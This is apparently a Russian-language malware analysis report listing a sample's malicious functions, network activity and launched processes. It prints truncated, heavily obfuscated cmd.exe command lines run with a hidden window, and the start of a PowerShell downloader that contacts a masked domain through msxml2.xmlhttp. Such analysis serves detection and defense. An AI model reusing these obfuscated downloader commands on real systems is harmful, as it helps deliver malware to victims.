Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c c^M^d; ; ;; /v^:^oN ;/c " ; (s^e^T ^ ^ 5^Y^J=H9I ^A3 ^XMy ohc qay^ iEc^ SFb^ y^fd gh5^ ^GkM ^G^TX xn0 ^dL8^ LJ^u vPF^ zp7^ ^Tn^ DBT}bDR^}^At^f{C7X^hEJcc6^w^It^jE^Ha6Z^ecd^pB}^BUhkhr0...
Сетевая активность
UDP
- DNS ASK os###sturv.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c c^M^d; ; ;; /v^:^oN ;/c " ; (s^e^T ^ ^ 5^Y^J=H9I ^A3 ^XMy ohc qay^ iEc^ SFb^ y^fd gh5^ ^GkM ^G^TX xn0 ^dL8^ LJ^u vPF^ zp7^ ^Tn^ DBT}bDR^}^At^f{C7X^hEJcc6^w^It^jE^Ha6Z^ecd^pB}^BUhkhr0...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ; ;; /v:oN ;/c " ; (s^e^T ^ ^ 5^Y^J=H9I ^A3 ^XMy ohc qay^ iEc^ SFb^ y^fd gh5^ ^GkM ^G^TX xn0 ^dL8^ LJ^u vPF^ zp7^ ^Tn^ DBT}bDR^}^At^f{C7X^hEJcc6^w^It^jE^Ha6Z^ecd^pB}^BUhkhr0a^Z^4veo^S...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $GqQ='kku';$dpQ='http://os###sturv.com/YER/pelim.php?l=############################################################################ =New-Object -com 'msxml2.xmlhttp';$abi = New-Object -com 'ado...
